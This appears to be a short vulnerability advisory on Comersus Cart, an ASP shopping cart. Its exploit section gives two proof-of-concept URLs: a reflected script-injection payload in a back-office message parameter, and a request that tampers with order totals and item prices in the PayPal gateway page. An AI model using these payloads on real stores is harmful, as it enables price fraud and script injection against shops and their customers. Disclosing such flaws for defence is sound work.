• info
• discussion
• exploit
• solution
• references

Comersus Open Technologies Comersus Cart Multiple Vulnerabilities

No exploit is required.

The following proof of concept examples are available:

XSS:
http://www.example.com/comersus/backofficeLite/comersus_backoffice_message.asp?message=<script>alert("VULNERABLE_TO_XSS")</script>

Order Manipulation:
http://www.example.com/comersus/store/comersus_gatewayPayPal.asp?idOrder=2002&OrderTotal=|102|222|228|22|130|36|209&name=Thomas&lastName=Ryan&address=123+Easy+Modify+Street&city=New+York&state=NY&zip=10001&country=US&phone=212%2D857%2D1731&email=tommy%40providesecurity%2Ecom&orderDetails=1x+%23RDHT%2F11+Red+Hat+Deluxe+WorkStation+Options%3A+%3D+%2479%2E00%0D%0A2x+%23WME%2F1+Windows+Millennium+Edition+Options%3A+%3D+%24398%2E00%0D%0A1x+%23BPRES2%2F6+So+You+Want+to+Be+President%3F+Options%3A+%3D+%2414%2E39%0D%0A